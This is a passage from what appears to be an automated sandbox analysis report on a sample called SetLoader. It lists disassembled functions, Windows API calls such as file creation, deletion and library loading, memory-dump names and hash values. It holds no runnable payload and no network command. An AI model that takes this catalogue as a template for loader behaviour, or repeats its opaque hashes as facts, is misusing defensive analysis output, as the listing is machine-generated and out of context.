                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID: FjuKc
                                              • API String ID: 1269201914-1445497496
                                              • Opcode ID: 68604b9752a2299f0a76f5d23a000d70558dc73d11fbb278ff25c53bd729af78
                                              • Instruction ID: d340abbe4b467d50703f0ca47313d643a9f44aa22f40f707267b745bfd9ff6e1
                                              • Opcode Fuzzy Hash: 68604b9752a2299f0a76f5d23a000d70558dc73d11fbb278ff25c53bd729af78
                                              • Instruction Fuzzy Hash: DCA002D5299101FD32455295AD36C36015ED4C5B55B31995DF445C44415441185A5075
                                              Function 0063E240 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0063DE0B: GetOEMCP.KERNEL32(00000000,?,?,0063E094,?), ref: 0063DE36
                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0063E0D9,?,00000000), ref: 0063E2B4
                                              • GetCPInfo.KERNEL32(00000000,0063E0D9,?,?,?,0063E0D9,?,00000000), ref: 0063E2C7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CodeInfoPageValid
                                              • String ID:
                                              • API String ID: 546120528-0
                                              • Opcode ID: a6927684b912c2841937f786d61cc8e2ecf20511c592af6fb5902c5a92147df6
                                              • Instruction ID: d881da925a82649e385a4d7b092610028ba29546f9c568e972513a64967590e9
                                              • Opcode Fuzzy Hash: a6927684b912c2841937f786d61cc8e2ecf20511c592af6fb5902c5a92147df6
                                              • Instruction Fuzzy Hash: 065106709042069FEB249F75C8916FBBBE7EF56300F14446ED0968B392D736A942CBE0
                                              Function 0061B45F Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointer.KERNELBASE(000000FF,?,00000800,?,?,00000000,?,?,0061B43B,00000800,00000800,00000000,?,?,0061A31D,?), ref: 0061B5EB
                                              • GetLastError.KERNEL32(?,?,0061A31D,?,?,?,?,?,?,?,?), ref: 0061B5FA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer
                                              • String ID:
                                              • API String ID: 2976181284-0
                                              • Opcode ID: 9431683866b6e7f33da1780cf1cd2b53f81e8c40fb6e4632535f9785cbbf1c2e
                                              • Instruction ID: a34ceadbb8a2f4ad5e55217c1a820020143e9cc6da31cac716f35d8396d79ca5
                                              • Opcode Fuzzy Hash: 9431683866b6e7f33da1780cf1cd2b53f81e8c40fb6e4632535f9785cbbf1c2e
                                              • Instruction Fuzzy Hash: AC41EF752043418BD720EF65D9849EAB3E7FF58320F18A62DE84683352D7B4D8C18BA2
                                              Function 0061B01E Relevance: 3.1, APIs: 2, Instructions: 89fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNELBASE(?,?,00000000,00000000,00000002,00000000,00000000,?,00000000,?,?,?,0061B967,?,?,006187FD), ref: 0061B0A4
                                              • CreateFileW.KERNEL32(?,?,00000000,00000000,00000002,00000000,00000000,?,?,00000800,?,?,0061B967,?,?,006187FD), ref: 0061B0D4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 9e00995b7b803e58ae967a73a46a39a951b6dc717f433ca238aea66c8819fba2
                                              • Instruction ID: ee1fdd7cbbc42d5677428d55eabdc035f204516d5fe5e6a14ab19a83bb7a4735
                                              • Opcode Fuzzy Hash: 9e00995b7b803e58ae967a73a46a39a951b6dc717f433ca238aea66c8819fba2
                                              • Instruction Fuzzy Hash: 38218D71504384AFE370DB24CC85BF7B7DEEB89321F044A1DF9A5C62D1D774A8848A62
                                              Function 0061B7E2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FlushFileBuffers.KERNEL32(?), ref: 0061B7FC
                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 0061B8B0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: File$BuffersFlushTime
                                              • String ID:
                                              • API String ID: 1392018926-0
                                              • Opcode ID: 8cb3b6de39b8c6c87b660d4be761e8b559027315a267f73140f29800ba315195
                                              • Instruction ID: 82322901a3f6f38487895ee2fd443e519dbced57e910074def22fb2288fe8baf
                                              • Opcode Fuzzy Hash: 8cb3b6de39b8c6c87b660d4be761e8b559027315a267f73140f29800ba315195
                                              • Instruction Fuzzy Hash: DB21F0312483919FC754DE24C891AFABBEAAF52B04F0C595CF4C1C7241D329E94CCBA2
                                              Function 00611FB0 Relevance: 3.1, APIs: 2, Instructions: 69COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: H_prolog3_wcslen
                                              • String ID:
                                              • API String ID: 3746244732-0
                                              • Opcode ID: 9a4e207f0ed23bc0e2e4c6b4878d71f45f368f3b45dc31b35a73248415e8fa12
                                              • Instruction ID: d893c2530bc5ac6dc9ed6f4ade1f295e1e959617b109099351072d5bd762e016
                                              • Opcode Fuzzy Hash: 9a4e207f0ed23bc0e2e4c6b4878d71f45f368f3b45dc31b35a73248415e8fa12
                                              • Instruction Fuzzy Hash: F6214A71900219AECF51AF94C895AEDB7B3BF0C300F14492DF545AB2A1CB395A91CB58
                                              Function 00636192 Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • FreeLibrary.KERNEL32(00000000,?,006760C8,?,?,?,00636386,00000004,InitializeCriticalSectionEx,00649624,InitializeCriticalSectionEx,00000000,?,0063613D,006760C8,00000FA0), ref: 00636215
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0063621F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AddressFreeLibraryProc
                                              • String ID:
                                              • API String ID: 3013587201-0
                                              • Opcode ID: bb39bdeced5393a89079613438ec3e839d58f04f0cac50fdbe097cba7c80a7b0
                                              • Instruction ID: c06b4489d81141115966974bfd232ee47c4f0a5d6998640ae1d537f484e714a0
                                              • Opcode Fuzzy Hash: bb39bdeced5393a89079613438ec3e839d58f04f0cac50fdbe097cba7c80a7b0
                                              • Instruction Fuzzy Hash: 00118E36600515AF8B26CFA8DC908AA77B7FB46360B258269F9169B310E7309E11CBD0
                                              Function 0061B8C0 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0061B907
                                              • GetLastError.KERNEL32 ref: 0061B914
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer
                                              • String ID:
                                              • API String ID: 2976181284-0
                                              • Opcode ID: 91598bfbf87b261c895fd95fdb3c897656a08d71b4844011932a0dffa405ea1e
                                              • Instruction ID: acaf7f900e8af04eb569923d329f9053f5c1867224cabacda9c03154846f2724
                                              • Opcode Fuzzy Hash: 91598bfbf87b261c895fd95fdb3c897656a08d71b4844011932a0dffa405ea1e
                                              • Instruction Fuzzy Hash: FD11E530A40710AFD724DA39C8457E6B3EAAB06371F581A68E663922D0D770ED86C760
                                              Function 0063BB34 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 0063BB55
                                                • Part of subcall function 0063BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00636A24,?,0000015D,?,?,?,?,00637F00,000000FF,00000000,?,?), ref: 0063BCC0
                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,006550C4,0061190A,?,?,00000007,?,?,?,00611476,?,00000000), ref: 0063BB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Heap$AllocAllocate_free
                                              • String ID:
                                              • API String ID: 2447670028-0
                                              • Opcode ID: 61e272b8c51dd91ce0c8a29e5bfcde3c74b2d8b28de660df90f71ee6026152ae
                                              • Instruction ID: 8050a23cf49046ada6b4155f199da1413831eaf73966da956e7d255e9100dda5
                                              • Opcode Fuzzy Hash: 61e272b8c51dd91ce0c8a29e5bfcde3c74b2d8b28de660df90f71ee6026152ae
                                              • Instruction Fuzzy Hash: 50F0F631500215AADB212A66EC01FEBB75B9FC2BB0F14711AFB06962A5DF60CC0181ED
                                              Function 0061C2E5 Relevance: 3.0, APIs: 2, Instructions: 38COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,0061BF5E,?,?), ref: 0061C305
                                                • Part of subcall function 0061DA1E: _wcslen.LIBCMT ref: 0061DA59
                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0061BF5E,?,?), ref: 0061C334
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AttributesFile$_wcslen
                                              • String ID:
                                              • API String ID: 2673547680-0
                                              • Opcode ID: 5ef334d135dfe6c10e5c67e48210b461303fb2d55152bd1b8ffbc173c97d3301
                                              • Instruction ID: e98eccce6051e462eaae81639f62645b9946260bf4eb7799aa1f0c0bbd42516b
                                              • Opcode Fuzzy Hash: 5ef334d135dfe6c10e5c67e48210b461303fb2d55152bd1b8ffbc173c97d3301
                                              • Instruction Fuzzy Hash: 8BF09A75201219ABDB00EF71CD01AEE77AEEF0A715F448099BA41E7250DB31DE848BA9
                                              Function 0061BC65 Relevance: 3.0, APIs: 2, Instructions: 36fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,0061B14B,?,00000000,0061AF6E,5CB4B331,00000000,0064517A,000000FF,?,00618882,?,?), ref: 0061BC82
                                                • Part of subcall function 0061DA1E: _wcslen.LIBCMT ref: 0061DA59
                                              • DeleteFileW.KERNEL32(?,?,?,00000800,?,0061B14B,?,00000000,0061AF6E,5CB4B331,00000000,0064517A,000000FF,?,00618882,?), ref: 0061BCAE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: DeleteFile$_wcslen
                                              • String ID:
                                              • API String ID: 2643169976-0
                                              • Opcode ID: de9d86f94886be10274f096e992a597fe5bf073d683020056c7052fdbd840c60
                                              • Instruction ID: 567e5093590bb569673fb71a6b6409e84b54935f81c94c20d5a9033499a3809f
                                              • Opcode Fuzzy Hash: de9d86f94886be10274f096e992a597fe5bf073d683020056c7052fdbd840c60
                                              • Instruction Fuzzy Hash: F1F0BE35601229ABDB00DF60CE41EEE73ADAF0E741F484069BA01D7240DF70DE888BA9
                                              Function 0063030B Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                              Download Yara Rule
                                              APIs
                                              • _swprintf.LIBCMT ref: 00630341
                                                • Part of subcall function 00614C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00614C13
                                              • SetDlgItemTextW.USER32(00000065,?), ref: 00630358
                                                • Part of subcall function 0062D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0062D875
                                                • Part of subcall function 0062D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0062D886
                                                • Part of subcall function 0062D864: IsDialogMessageW.USER32(00010418,?), ref: 0062D89A
                                                • Part of subcall function 0062D864: TranslateMessage.USER32(?), ref: 0062D8A8
                                                • Part of subcall function 0062D864: DispatchMessageW.USER32(?), ref: 0062D8B2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                              • String ID:
                                              • API String ID: 2718869927-0
                                              • Opcode ID: bf2dba8a35abb3ac65d274e8ada0c9e8aaf6a7d4fe5a662d38221e9ba45730c6
                                              • Instruction ID: c6382dbbcbaf54149f97dadff58cfbb3af1478ea01d8b14d98b0d3ea8ecf80af
                                              • Opcode Fuzzy Hash: bf2dba8a35abb3ac65d274e8ada0c9e8aaf6a7d4fe5a662d38221e9ba45730c6
                                              • Instruction Fuzzy Hash: 61F024B250031C6ACB00EB69EC06EEF3BEE9B0D301F08005AB201E7152DA349A408BA5
                                              Function 0061BCDD Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,0061BCD4,?,00618607,?), ref: 0061BCFA
                                                • Part of subcall function 0061DA1E: _wcslen.LIBCMT ref: 0061DA59
                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,0061BCD4,?,00618607,?), ref: 0061BD24
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AttributesFile$_wcslen
                                              • String ID:
                                              • API String ID: 2673547680-0
                                              • Opcode ID: 4c9366d844ec6eaf42bc3097fd24bfd867c861bd87685d75de0eebed9829319c
                                              • Instruction ID: 31f33864f296e1222dd91a7a60b26913615145e36983bed3d9e2779116b46529
                                              • Opcode Fuzzy Hash: 4c9366d844ec6eaf42bc3097fd24bfd867c861bd87685d75de0eebed9829319c
                                              • Instruction Fuzzy Hash: 18F0B436A002185BC700EB78DD019EEB3BEEF4F761F0401A9FA41E7280DB709D818695
                                              Function 00623184 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,?,00000002,00000002,?,006231C7,0061D526), ref: 00623191
                                              • GetProcessAffinityMask.KERNEL32(00000000,?,006231C7), ref: 00623198
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Process$AffinityCurrentMask
                                              • String ID:
                                              • API String ID: 1231390398-0
                                              • Opcode ID: 7a9a8e1f1c7c1a8682727b060f3a999861d47880f8af9f6ca8d8fb04bb0345fc
                                              • Instruction ID: 9b791756fed6b47774987b26e62c412637ab1d28688f318a096f3c8c1879107a
                                              • Opcode Fuzzy Hash: 7a9a8e1f1c7c1a8682727b060f3a999861d47880f8af9f6ca8d8fb04bb0345fc
                                              • Instruction Fuzzy Hash: 3DE0D876B0053567DF098BA4EC098EB73DFEA453043104079B503D3300FB38DE054AA0
                                              Function 006228AB Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 006228D4
                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00621309,Crypt32.dll,00000000,00621383,00000200,?,00621366,00000000,00000000,?), ref: 006228F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: DirectoryLibraryLoadSystem
                                              • String ID:
                                              • API String ID: 1175261203-0
                                              • Opcode ID: b40c3184bb6c7a496b4f17ffc61c9f4f30fbd54660c22aa032d9ba8179ab521a
                                              • Instruction ID: 201cde74c868adbaf731655c8b8cd212c18f6acc972dde9aa8417c114c619ae3
                                              • Opcode Fuzzy Hash: b40c3184bb6c7a496b4f17ffc61c9f4f30fbd54660c22aa032d9ba8179ab521a
                                              • Instruction Fuzzy Hash: A1F08276A00219ABCB10DF65DD05DDFB7FDEF4E751F000469B605D3100DA78EA858BA9
                                              Function 0062C34D Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0062C36E
